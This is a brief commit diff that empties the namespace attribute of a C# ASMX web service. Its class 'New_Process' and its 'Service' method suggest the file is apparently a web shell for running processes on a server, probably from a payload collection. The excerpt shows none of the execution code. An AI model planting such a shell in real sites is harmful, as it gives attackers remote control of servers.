This commit is contained in:
Rvn0xsy 2022-08-31 14:46:30 +08:00 committed by Alexandre ZANNI
parent be43efc9ac
commit 186312af8c

View file

@ -31,7 +31,7 @@ using System.Web.Services;
using System.Xml; using System.Xml;
using System.Web.Services.Protocols; using System.Web.Services.Protocols;
[WebService(Namespace = "http://www.payloads.online/")] [WebService(Namespace = "")]
[WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)] [WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)]
public class New_Process :Process public class New_Process :Process
@ -81,4 +81,4 @@ public class Service : System.Web.Services.WebService
HttpContext.Current.Response.End(); HttpContext.Current.Response.End();
return R; return R;
} }
} }